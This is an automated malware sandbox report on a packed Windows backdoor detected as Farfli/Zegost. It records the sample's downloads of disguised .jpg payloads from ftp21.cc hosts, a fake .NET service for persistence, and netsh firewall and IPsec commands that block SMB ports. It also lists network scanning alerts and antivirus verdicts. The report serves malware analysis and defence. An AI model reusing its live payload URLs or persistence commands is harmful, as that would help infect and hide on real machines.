Summary | ZeroBOX

wmi.jpg.exe

UPX PE32 PE File
Category | Machine | Started | Completed
FILE | s1_win7_x6402 | July 3, 2024, 6:36 p.m. | July 3, 2024, 6:39 p.m.
Size 45.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5 1953c97029337ec04a8d4b69911d843f
SHA256 cd8c11ec94b74fd3357e4b9ed00dfb2c1d94d9b1bba9f6fc4d6c415aa8437b96
CRC32 87B032F7
ssdeep 768:XKm1dZvlQNI897NooQ7l6f6VW+Y5/gtp/Xy8QcXa6953qWJKQtACa:XKIdZdQC4NS7wjfQp/Xy8pa67qNQqv
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow | SID | Signature | Category
UDP 192.168.56.102:62846 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic
UDP 192.168.56.102:51405 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic
TCP 119.203.212.165:80 -> 192.168.56.102:49173 | 2014819 | ET INFO Packed Executable Download | Misc activity
TCP 119.203.212.165:80 -> 192.168.56.102:49173 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 119.203.212.165:80 -> 192.168.56.102:49173 | 2022053 | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 | A Network Trojan was detected
TCP 119.203.212.165:80 -> 192.168.56.102:49173 | 2023672 | ET MALWARE JS/WSF Downloader Dec 08 2016 M4 | A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.102:49176 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 211.108.60.155:80 -> 192.168.56.102:49176 | 2022053 | ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 | A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.102:49176 | 2023672 | ET MALWARE JS/WSF Downloader Dec 08 2016 M4 | A Network Trojan was detected
TCP 192.168.56.102:49289 -> 192.168.0.112:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity
UDP 192.168.56.102:53778 -> 8.8.8.8:53 | 2012171 | ET INFO DYNAMIC_DNS Query to 3322.org Domain | Misc activity
UDP 192.168.56.102:58521 -> 164.124.101.2:53 | 2027758 | ET DNS Query for .cc TLD | Potentially Bad Traffic
TCP 218.57.129.51:80 -> 192.168.56.102:49995 | 2026537 | ET HUNTING Suspicious EXE Download Content-Type image/jpeg | Potential Corporate Privacy Violation
TCP 192.168.56.102:51515 -> 192.168.0.3:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity
TCP 192.168.56.102:53332 -> 51.161.196.188:443 | 2038968 | ET INFO SSH-2.0-Go version string Observed in Network Traffic | Misc activity
TCP 192.168.56.102:55989 -> 192.168.0.159:135 | 2001581 | ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection | Misc activity
TCP 192.168.56.102:59012 -> 192.168.15.42:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity
UDP 192.168.56.102:50447 -> 164.124.101.2:53 | 2034196 | ET INFO External IP Lookup Domain DNS Lookup (my-ip .io) | Potentially Bad Traffic
TCP 192.168.56.102:49182 -> 192.168.14.248:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity
UDP 192.168.56.102:55774 -> 8.8.8.8:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity
UDP 192.168.56.102:55774 -> 164.124.101.2:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.102:49914 -> 59.151.136.153:443 | C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com | 2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63
TLS 1.2 192.168.56.102:50161 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:51926 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:54901 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:51838 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.102:54395 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23

Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Ok.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ok.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ERR IPsec[05010] :
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: FilterList with name 'Filter1' already exists
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ERR IPsec[05019] :
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Policy with name 'Block' does not exist
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://118.184.169.48/dyndns/getip
suspicious_features Connection to IP address suspicious_request GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://16.162.161.106:8080/api/node/ip_validate
domain members.3322.org
request GET http://down.ftp21.cc/445.jpg
request GET http://hook.ftp21.cc/MpMgSvc.dll
request GET http://hook.ftp21.cc/MpMgSvc.jpg
request GET http://118.184.169.48/dyndns/getip
request GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
request GET http://hook.ftp21.cc/Hooks.jpg
request GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe
request GET http://ssl.ftp21.cc/64.jpg
request GET http://down.ftp21.cc/Update.txt
request GET http://16.162.161.106:8080/api/node/ip_validate
name RT_VERSION language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0001f05c size 0x000003fc
domain api.ipify.org
file C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
Time & API Arguments Status Return Repeated

CreateServiceA

service_start_name:
start_type: 2
password:
display_name: .NET Runtime Optimization Service v3.0.30317_X86
filepath: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
service_name: clr_optimization_v3.0.30317_32
filepath_r: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
desired_access: 983551
service_handle: 0x004fd2a8
error_control: 1
service_type: 16
service_manager_handle: 0x004fd230
1 5231272 0
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add policy name=Block
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add filterlist name=Filter1
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add filteraction name=FilteraAtion1 action=block
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
filepath: netsh.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: netsh.exe
parameters: ipsec static set policy name=Block assign=y
filepath: netsh.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3020
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 69632
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
section UPX1 size_of_data 0x0000ac00 virtual_address 0x00014000 virtual_size 0x0000b000 entropy 7.92474924763 description A section with a high entropy has been found
entropy 0.966292134831 description Overall entropy of this PE file is high
section UPX0 description Section name indicates UPX
section UPX1 description Section name indicates UPX
cmdline netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline netsh.exe ipsec static add policy name=Block
cmdline "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline netsh.exe ipsec static add filterlist name=Filter1
cmdline "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline netsh.exe ipsec static add filteraction name=FilteraAtion1 action=block
cmdline netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
cmdline netsh.exe ipsec static set policy name=Block assign=y
cmdline "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
cmdline "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline netsh.exe ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
cmdline "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
host 16.162.161.106
host 51.161.196.188
service_name clr_optimization_v3.0.30317_32 service_path C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe
Bkav W32.AIDetectMalware
Elastic malicious (moderate confidence)
Cynet Malicious (score: 100)
CAT-QuickHeal Trojan.Aksula.A
Cylance Unsafe
VIPRE Gen:Heur.Mint.Zard.30
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 0040f7ad1 )
K7GW Trojan ( 0040f7ad1 )
Cybereason malicious.029337
Baidu Win32.Trojan.Farfli.bg
ESET-NOD32 a variant of Win32/Farfli.JU
APEX Malicious
BitDefender Gen:Heur.Mint.Zard.30
MicroWorld-eScan Gen:Heur.Mint.Zard.30
Rising Backdoor.Farfli!1.B6C5 (CLASSIC)
Emsisoft Gen:Heur.Mint.Zard.30 (B)
F-Secure Trojan.TR/Crypt.FKM.Gen
DrWeb Trojan.Siggen28.63607
McAfeeD Real Protect-LS!1953C9702933
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.1953c97029337ec0
Sophos Mal/Behav-160
Ikarus Backdoor.Win32.Zegost
Google Detected
Avira TR/Crypt.FKM.Gen
Kingsoft malware.kb.b.958
Xcitium Backdoor.Win32.Zegost.c@4m3x9i
Arcabit Trojan.Mint.Zard.30
ZoneAlarm VHO:Backdoor.Win32.Lotok.gen
Varist W32/KillAV.AU.gen!Eldorado
AhnLab-V3 Trojan/Win32.OnlineGameHack.R2023
BitDefenderTheta AI:Packer.8EFBDF1C1F
DeepInstinct MALICIOUS
VBA32 BScope.TrojanDDoS.Macri
MAX malware (ai score=87)
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Farfli.PZA!tr
CrowdStrike win/malicious_confidence_100% (D)
alibabacloud Backdoor:Win/Parite.C